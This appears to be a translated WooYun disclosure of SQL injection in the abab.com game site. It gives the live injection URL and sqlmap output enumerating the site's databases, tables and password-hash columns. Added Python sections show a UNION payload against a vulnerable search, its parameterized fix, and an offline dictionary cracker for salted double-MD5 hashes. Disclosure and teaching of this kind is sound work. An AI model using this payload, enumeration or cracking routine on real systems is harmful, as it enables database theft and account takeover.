Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0203591

Title: Game security: the ABAB mini-game site has a serious security flaw (affects the whole site's 500K+ users)

Vendor: abab.com

Author: Exploit DB

Submitted: 2016-05-05 14:52

Fix time: 2016-05-10 15:00

Public disclosure: 2016-05-10 15:00

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2016-05-05: details sent to the vendor, awaiting vendor handling
2016-05-10: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

14 databases affected; information of 500K+ users exposed

Detailed description:

http://m.abab.com/index.php?a=Search&keyWord=会说话的狗狗本
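The injection point above is a search endpoint whose keyWord parameter reaches the SQL statement unescaped; the UNION-style enumeration sqlmap then runs is what produced the database and table listings that follow. What follows is an added example, not code from abab.com or from this report: a minimal search handler written the vulnerable way next to its parameterized form, run against an in-memory sqlite3 database standing in for the site's MySQL. The table `youxi`, its rows and the account rows are constructed; `ucenter_members` and its `username`/`password`/`salt` columns are the names shown in the report's sqlmap output.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (sqlite3, in memory)."""
    con = sqlite3.connect(":memory:")
    # Assumed game table the search is meant to hit; name and rows are made up.
    con.execute("CREATE TABLE youxi (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO youxi VALUES (?, ?)",
                    [(1, "会说话的狗狗本"), (2, "开心消消乐")])
    # Account table and column names as in the report's sqlmap output;
    # the rows (and the dummy 32-hex hashes) are constructed.
    con.execute("CREATE TABLE ucenter_members "
                "(uid INTEGER, username TEXT, password TEXT, salt TEXT)")
    con.executemany("INSERT INTO ucenter_members VALUES (?, ?, ?, ?)",
                    [(1, "admin", "0123456789abcdef0123456789abcdef", "a1b2c3"),
                     (2, "alice", "fedcba9876543210fedcba9876543210", "z9y8x7")])
    con.commit()
    return con


def search_vulnerable(con: sqlite3.Connection, keyword: str) -> list:
    """The pattern behind index.php?a=Search&keyWord=...: the parameter is
    spliced into the statement text, so any SQL syntax in it is executed."""
    sql = f"SELECT id, name FROM youxi WHERE name LIKE '%{keyword}%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, keyword: str) -> list:
    """Parameterized form: the keyword is bound as a value, so it can only
    ever match rows, never change the query."""
    sql = "SELECT id, name FROM youxi WHERE name LIKE ?"
    return con.execute(sql, (f"%{keyword}%",)).fetchall()


# A UNION payload of the kind sqlmap sends once it has found the column count
# (two here). The closing "-- " turns the rest of the original WHERE clause
# into a comment. sqlite concatenates with ||; on MySQL this would be CONCAT().
PAYLOAD = "x%' UNION SELECT username, password || ':' || salt FROM ucenter_members-- "


if __name__ == "__main__":
    db = make_db()
    print("legit search  :", search_safe(db, "狗狗"))
    print("vulnerable    :", search_vulnerable(db, PAYLOAD))  # leaks account rows
    print("parameterized :", search_safe(db, PAYLOAD))        # matches nothing
```

With the payload, the vulnerable handler returns the `username` and `password:salt` pairs of every account, which is exactly the data the column listing below exposes; the parameterized handler treats the same string as a literal search term and returns no rows. The fix is the same on the site's PHP/MySQL stack: bind the keyword (PDO prepared statements or mysqli with placeholders) and never build the LIKE clause from the raw parameter.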


[Screenshot: QQ截图20160425193331.png]


available databases [14]:
[*] abab
[*] abab_article
[*] abab_bbs
[*] abab_comment
[*] abab_faka
[*] abab_kaifu
[*] abab_play
[*] abab_soft
[*] abab_spreader
[*] abab_youxi
[*] abab_youxi_soft
[*] abab_youxiku
[*] information_schema
[*] test


Forgive me: I ran a server for two hours and only finished dumping one database.

Database: abab_bbs
[297 tables]
+-------------------------------+
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_profile |
| common_member_profile_setting |
| common_member_security |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_patch |
| common_plugin |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_report |
| common_searchindex |
| common_secquestion |
| common_session |
| common_setting |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_baidu_user |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_onlinelist |
| forum_order |
| forum_poll |
| forum_polloption |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| gamepk |
| gamepk_cate |
| gamepk_comment |
| gamepk_config |
| gamepk_gold |
| gamepk_gold_log |
| gamepk_log |
| gamepk_seo |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_userapp |
| home_userappfield |
| home_visitor |
| mobile_setting |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| strayer_article |
| strayer_article_content |
| strayer_article_title |
| strayer_category |
| strayer_evo |
| strayer_evo_log |
| strayer_evolution |
| strayer_fastpick |
| strayer_member |
| strayer_picker |
| strayer_rules |
| strayer_searchindex |
| strayer_setting |
| strayer_timing |
| strayer_url |
| strayer_user |
| ucenter_admins |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_copy |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
+-------------------------------+




Database: abab_bbs
Table: ucenter_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(50) |
+---------------+-----------------------+
Database: abab_bbs
Table: common_member
[22 columns]
+--------------------+-----------------------+
| Column | Type |
+--------------------+-----------------------+
| emailstatus | |
| accessmasks | tinyint(1) |
| adminid | tinyint(1) |
| allowadmincp | tinyint(1) |
| avatarstatus | tinyint(1) |
| conisbind | tinyint(1) unsigned |
| credits | int(10) |
| email | char(40) |
| extgroupids | char(20) |
| groupexpiry | |
| groupid | smallint(6) unsigned |
| newpm | smallint(6) unsigned |
| newprompt | smallint(6) unsigned |
| notifysound | tinyint(1) |
| onlyacceptfriendpm | tinyint(1) |
| password | char(32) |
| regdate | int(10) unsigned |
| status | tinyint(1) |
| timeoffset | char(4) |
| uid | mediumint(8) unsigned |
| username | char(15) |
| videophotostatus | tinyint(1) |
+--------------------+-----------------------+
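The `password char(32)` and `salt char(6)` pair in ucenter_members above is the layout used by UCenter, the account backend bundled with Discuz! (the `common_*`, `forum_*` and `ucenter_*` table names point the same way), which stores md5(md5(plaintext) + salt). That scheme is assumed here, since the report shows only the schema and not the software. The following is an added example, not code from the report or from the site, showing what an attacker holding just those two columns can do offline, and therefore why a dump of this table calls for a forced password reset and not only a patch of the injection. The accounts, salts and wordlist are constructed.

```python
import hashlib


def ucenter_hash(plaintext: str, salt: str) -> str:
    """UCenter storage scheme (assumed from the column layout):
    hex(md5(hex(md5(plaintext)) + salt)). Two unkeyed MD5 rounds, so the
    per-guess cost is two fast hashes and GPUs try billions per second."""
    inner = hashlib.md5(plaintext.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def crack_dump(rows, wordlist):
    """Offline dictionary attack against leaked (username, password, salt)
    rows. The 6-character salt defeats a shared rainbow table but not this
    loop; returns {username: recovered_plaintext} for every hit."""
    recovered = {}
    for username, stored, salt in rows:
        for guess in wordlist:
            if ucenter_hash(guess, salt) == stored:
                recovered[username] = guess
                break
    return recovered


# Constructed dump: two weak passwords and one strong one, hashed the UCenter way.
LEAKED_ROWS = [
    ("admin", ucenter_hash("123456", "a1b2c3"), "a1b2c3"),
    ("alice", ucenter_hash("password", "z9y8x7"), "z9y8x7"),
    ("bob",   ucenter_hash("Tq9#vL2p!xRw", "m4n5o6"), "m4n5o6"),
]
WORDLIST = ["123456", "password", "abab123", "qwerty"]


if __name__ == "__main__":
    # admin and alice fall to the wordlist; bob's password is not in it
    print(crack_dump(LEAKED_ROWS, WORDLIST))
```

Because the salt sits next to the hash in the same leaked row, it adds no protection against a targeted crack; it only prevents precomputation across users. Combined with the `email`, `secques` and `regip` columns in the same table, the practical impact of this dump is account takeover on this site and credential stuffing elsewhere, which is what the "500K+ users" in the title refers to.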


There are still several databases I have not dumped. A game site that has been running for this many years should have at least a million-plus users; I ask the reviewers to verify.

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source: Exploit DB@WooYun


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored)

Ignored at: 2016-05-10 15:00

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet


Comments: